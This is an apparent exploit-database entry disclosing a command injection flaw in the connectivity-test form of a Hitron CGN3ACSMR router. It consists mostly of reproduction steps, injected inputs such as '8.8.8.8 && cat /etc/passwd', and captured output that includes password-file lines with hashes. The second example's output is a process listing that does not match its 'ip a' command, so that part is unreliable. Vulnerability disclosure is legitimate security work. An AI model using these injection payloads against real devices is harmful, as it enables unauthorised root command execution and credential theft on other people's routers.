# Exploit title: Hitron Router (CGN3ACSMR) - Remote Code Execution # Author: Dolev Farhi (dolevf at protonmail.ch) # Date: 29-10-2015 # Vendor homepage: http://www.hitrontech.com/en/index.php # Software version: 4.5.8.16 # Hardware version: 1A # Details: Hitron routers provide an interface to test connectivity (ping, tracert) via the graphical user interface of the router (Management UI). This interface is vulnerable to code injection using the && argument after the IP address. # Steps to reproduce: 1. Navigate to the dashboard 2. Navigate to the admin tab 3. Type an ip address in the Destination form 4. append any code you want after the ip. Example one: 8.8.8.8 && cat /etc/passwd Result root:$1$27272727:0:0::/:/bin/false nobody:$1$27272727:65535:65535::/:/bin/false rogcesadmin:filtered/:100:100::/:/usr/sbin/cli =============Complete============== Example two: 8.8.8.8 && ip a PID USER VSZ STAT COMMAND 1 root 1268 S init 2 root 0 SW [kthreadd] 3 root 0 SW [ksoftirqd/0] 5 root 0 SW [kworker/u:0] 6 root 0 SW< [khelper] 7 root 0 SW [irq/74-hw_mutex] 8 root 0 SW [sync_supers] 9 root 0 SW [bdi-default] 10 root 0 SW< [kblockd] 11 root 0 SW< [gPunitWorkqueue] 12 root 0 SW [irq/79-punit_in] 13 root 0 SW [kswapd0] 14 root 0 SW< [crypto]